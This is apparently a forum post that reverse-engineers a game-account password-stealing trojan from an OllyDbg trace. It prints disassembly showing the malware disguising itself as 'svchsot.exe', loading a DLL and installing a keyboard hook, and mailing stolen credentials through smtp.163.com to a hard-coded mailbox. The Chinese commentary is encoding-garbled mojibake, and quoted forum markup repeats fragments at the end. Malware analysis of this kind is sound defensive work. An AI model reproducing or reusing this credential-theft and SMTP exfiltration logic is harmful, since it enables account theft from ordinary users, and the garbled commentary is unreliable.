004015F3 68 C4554200 push unpacked.004255C4£
; ASCII "D:\WINDOWS\System32\locarxjh.sls"
004015F8 FF15 D8824200 call dword ptr ds:[<&kernel32.CreateFileA>]£
; kernel32.CreateFileA
...Ò»Ö±ÍùÏÂ×ß...
µ±²¡¶¾Íê³ÉÁ˸´ÖÆ¡¢Ð´×¢²á±íÖ®ºó£¬Ëæ¼´¼¤»îλÓÚ%systemroot%\system32Ŀ¼ÏµÄsvchsot.exe½ø³Ì£¬½Ó׎øÈë¼à¿Ø¹ý³ÌÖÐ...
0040110D 50 push eax
0040110E 6A 00 push 0
00401110 6A 00 push 0
00401112 FF15 F4834200 call dword ptr ds:[4283F4] ; SHELL32.ShellExecuteA
00401118 3BF4 cmp esi,esp
0040111A E8 610D0000 call svchsot.00401E80
0040111F B8 01000000 mov eax,1
00401124 E9 96020000 jmp svchsot.004013BF ;Nop
ÕâÀïÐÞ¸ÄÆäÌø×ª£¬ ÈÃÆä¼ÌÐøÍùÏÂÖ´ÐУ¬Ö÷ҪĿµÄÊÇÒòΪÎҵĵçÄÔÖиù±¾Ã»Óа²×°¡°Ä§ÊÞ¡±µÄÓÎÏ·£¬Èç¹û¼à¿Ø²»µ½ÓÎÏ·µÄ´æÔÚ£¬µ±È»¾Í²»´æÔÚµÁ
È¡Õʺš¢ÃÜÂ룬¼Ì¶ø·¢ËͳöÈ¥ÁË...
½Ó×ÅÍùÏÂ×ß...
004012FB 68 C4554200 push svchsot.004255C4£
; ASCII "D:\WINDOWS\System32\locarxjh.sls"
00401300 FF15 BC824200 call dword ptr ds:[4282BC]£
; kernel32.LoadLibraryA
00401306 3BF4 cmp esi,esp
00401308 E8 730B0000 call svchsot.00401E80
0040130D A3 BC554200 mov dword ptr ds:[4255BC],eax
00401312 833D BC554200 0>cmp dword ptr ds:[4255BC],0
00401319 75 07 jnz short svchsot.00401322
0040131B 33C0 xor eax,eax
0040131D E9 9D000000 jmp svchsot.004013BF
00401322 8BF4 mov esi,esp
00401324 68 1C204200 push svchsot.0042201C£
; ASCII "insthook"
00401329 8B15 BC554200 mov edx,dword ptr ds:[4255BC]
0040132F 52 push edx
00401330 FF15 34834200 call dword ptr ds:[428334]£
; kernel32.GetProcAddress
00401336 3BF4 cmp esi,esp
00401338 E8 430B0000 call svchsot.00401E80£
; not
0040133D A3 C0554200 mov dword ptr ds:[4255C0],eax
00401342 8BF4 mov esi,esp
00401344 8D85 C4FCFFFF lea eax,dword ptr ss:[ebp-33C]
0040134A 50 push eax
0040134B 8B8D 8CFCFFFF mov ecx,dword ptr ss:[ebp-374]
00401351 51 push ecx
00401352 FF15 C0554200 call dword ptr ds:[4255C0]£
; locarxjh.insthook ; F7 traceing
½øÈëºó
10001000 > A1 04F10010 mov eax,dword ptr ds:[1000F104]
10001005 85C0 test eax,eax
10001007 75 09 jnz short locarxjh.10001012
10001009 8B4424 04 mov eax,dword ptr ss:[esp+4]
1000100D A3 04F10010 mov dword ptr ds:[1000F104],eax
10001012 57 push edi
10001013 BF 58F20010 mov edi,locarxjh.1000F258£
; ASCII "²âÊÔ@163.com" ;¿´µ½ÁËÂð. Õâ¾ÍÊÇÓÃÀ´´«µÝÃÜÂëµÄÓÊÏä...
10001018 83C9 FF or ecx,FFFFFFFF
1000101B 33C0 xor eax,eax
1000101D F2:AE repne scas byte ptr es:[edi]
1000101F F7D1 not ecx
10001021 49 dec ecx
10001022 /0F85 B5000000 jnz locarxjh.100010DD£
; Ìø×ªÒѾʵÏÖ? ²»¿ÉÒÔÈÃÆäÌø×ß!
10001028 8B4C24 0C mov ecx,dword ptr ss:[esp+C]
1000102C 56 push esi
1000102D 51 push ecx
1000102E E8 8D050000 call locarxjh.100015C0
;F7½øÈë...
10001033 83C4 04 add esp,4
10001036 B9 40000000 mov ecx,40
1000103B 33C0 xor eax,eax
1000103D BF 00F00010 mov edi,locarxjh.1000F000£
; ASCII "D:\WINDOWS\System32\foxmir.sls"
1000108D 8B35 30A00010 mov esi,dword ptr ds:[<&KERNEL32.CreateThread>]£
10001093 50 push eax
10001094 50 push eax
10001095 FFD6 call esi£
; kernel32.CreateThread £» ´´½¨ÐÂÏß³Ì×¼±¸·¢ËÍÁË...
¸ú½ø1000102E´¦µÄCALLºó£¬¾Í¿ÉÒÔºÜÇå³þµÄ¿´µ½ÕâЩÓÊÏäÐÅÏ¢£¬ Æäʵ£¬½øÈëºó£¬ÎÒÃÇ¿´µ½´Ë´¦´úÂëµÄÍùÉÏ´¦...
100015C0 55 push ebp
;½øÈëºóÀ´µ½´Ë´¦.... ÍùÉÏ¿´´úÂë... Äã»á·¢ÏÖÒâÏë²»µ½µÄÊÕ»ñ...
100015C1 8B6C24 08 mov ebp,dword ptr ss:[esp+8]
100015C5 56 push esi
100015C6 33F6 xor esi,esi
100015C8 B9 14F10010 mov ecx,locarxjh.1000F114 ; ASCII "Smtp.163.com"
...Õâ¾ÍÊÇÍùÉÏ¿´µÄ´úÂë...
1000151B B8 BCF20010 mov eax,locarxjh.1000F2BC ; ASCII "²âÊÔ@163.com"
10001520 894C24 20 mov dword ptr ss:[esp+20],ecx
10001524 8B0D 84F50010 mov ecx,dword ptr ds:[1000F584]
1000152A 894424 1C mov dword ptr ss:[esp+1C],eax
[refer=2,¤¸¡îve ‘Ù¡á]\n004015F3 68 C4554200 push unpacked.004255C4£ \r\n\r\n; ASCII "D:\WINDOWS\System32\locarxjh.sls" \r\n\r\n00...[/refer]
[nquote=2006-09-14 16:40,¤¸¡îve ‘Ù¡á]\n004015F3 68 C4554200 push unpacked.004255C4£ \r\n\r\n; ASCII "D:\WINDOWS\System32\locarxjh.sls" \r\n\r\n00...[/nquote]
|